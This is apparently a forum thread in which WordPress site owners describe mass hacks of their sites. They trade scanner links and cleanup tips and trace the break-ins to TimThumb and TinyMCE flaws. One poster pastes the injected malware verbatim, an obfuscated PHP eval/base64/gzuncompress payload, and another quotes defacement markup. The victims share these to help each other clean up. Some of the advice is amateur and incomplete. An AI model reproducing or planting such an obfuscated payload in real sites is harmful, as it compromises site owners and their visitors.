I am a website developer and have been hacked by a people refering themselves as linuxploit crew. I ran my site with sucuri malware scanning software whic is free and told me exactly where to go and was able to delete the items. It effected about a 100 sites so it was quite long to do this. I thought i was throught with this nightmare and now one of my accounts contacted me and said they could not access account. I went in and removed malware again….it was in the index page and in the footer and index of theme. I changed password on filezilla, my hosting company and and my ftp login. I am at a loss and would love any advice! Thank you. All my wordpress sites have the latest versions and all plugins are up to date too. I am only using the most popular plugins as listed my wordpress too. My hosting company is 1and1.com
I lost twelve sites this week and am devestated. Most current WP and plug-ins and most popular plug-ins at that. My hosting reseller account is with Lonex. I can’t change my passwords fast enough to stay ahead of my hacker “Saad” IP Iraq. I use a 64bit system and need advice on malware scanning program.
http://sitecheck.sucuri.net/scanner/ is what i used to scan them and it took me right to the source of the attack. Let me know what is says and i will try to help you.
ditto – I’m in the same boat
that is “WordPress.org does not recognize me at all – not my email address, my username, or my password. My host took my site back from theme eleven to default after my site had been cmpletely taken over by a hacker.
The blog is still there, but I cannot get in as administrator.”
I ran through this site as suggested above;
http://sitecheck.sucuri.net/scanner/
and no malware or blacklist but rec that I upgrade my wordpress
I got into my ftp using my web host and am now downloading my site to a folder on my desk top.
When that is done. what should I do?
Not a expert, if you dont have a backup of your site your server can sometimes can send you a copy of site if done quickly after your site is hacked. You can login to your ftp and load backup copy of site and this should allow you restore site before it was hacked. After you load site, run than scan and see if the malware was in your site before it went down. Good luck!
Alas I have to join the ranks of having been hacked this morning. So frustrating. I ran the sitecheck scan and I got back this message:
Web site defaced.
Details: http://sucuri.net/malware/entry/MW:DEFACED:01
<p align=”center”><b><font color=”red” face=”Tahoma”>HaCkEd BY Mr.m0r0 MoRoCcAn HaCkEr</font>
<font color=green>Mr.m0r0 WaS HeRe </h2></font>
and Malaware detected at http://www.404testpage4525d2fdc
I presume there is nothing I can do about this. My hosting server wants to take it all down and I can restore from backups.
You could go into your ftp, find that file and look for malware. When you find that file highlight it and hold down and look for view edit, my hacks were usually at bottom of page, it looked totally different from the other code. I erased and then saved. If you have mutiple sites, scan other sites too. Good Luck.
Try to google your plugins. TimThumb for one has maaany security flaws..
I also created a thread about been hacked and got ignore. Yes is true and is out there. I have a hosting account and so far 4 of my domains have been hacked. I changed passwords, SQL passwords, email passwords, blocked IP address, etc and they still get in.
My first site was hacked directly to the root impamting a mijn some ign bank link phishing site. My other sites has been trough tinymce they inject a security.html file.
My Hosting people keep suspending my accounts and is getting annoying and since they dont know they keep telling me I need to be sure I have the latest updates which I do.
@scott, What do you know about a software named “SpyShelter” if anything?
Found out alot today about the flaws in my wordpress themes and the root of my hack. They enter my server through the the timthump image resizing tool on alot of wordpress themes. I bought alot of themes from themeforest and many of my sites had this in the themes. I am attaching a article that might help people with this issues. My server helped me find the access point for the hackers. After they had access they soread alware my 110 sites (NIGHTMARE is close to being over) http://www.woothemes.com/2011/08/timthumb-security-flaw-patch/
This article came from a theme seller so you know many people around the country are experiencing the same thing. And this is what the malware in my site looked like,
eval(gzuncompress(base64_decode(‘eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I=’))); ?>
I hope this helps!
Wow! Thank you so much Scott. My themes are all from Theme Forest and I went to the link but am not sure how to fix. I have Dynamix and Awake. Can you help? I want to replace these files before new sites get hacked. =)
I use awake and dynamix on several sites, How do you want me to contact you. I could friend you on facebook? How many sites do you have? I think i can help you
I also been working with my hosting people and they did some research. Which two of my sites has been hack and deposit a file under the tinymce folder. Sadly I deleted the folder and the WYSIWYG didnt work well so I uploaded a fresh copy of the folder but it seems that tinymce has a vulnerability as well. Read this out http://seclists.org/fulldisclosure/2011/Nov/427?utm_source=twitterfeed&utm_medium=twitter
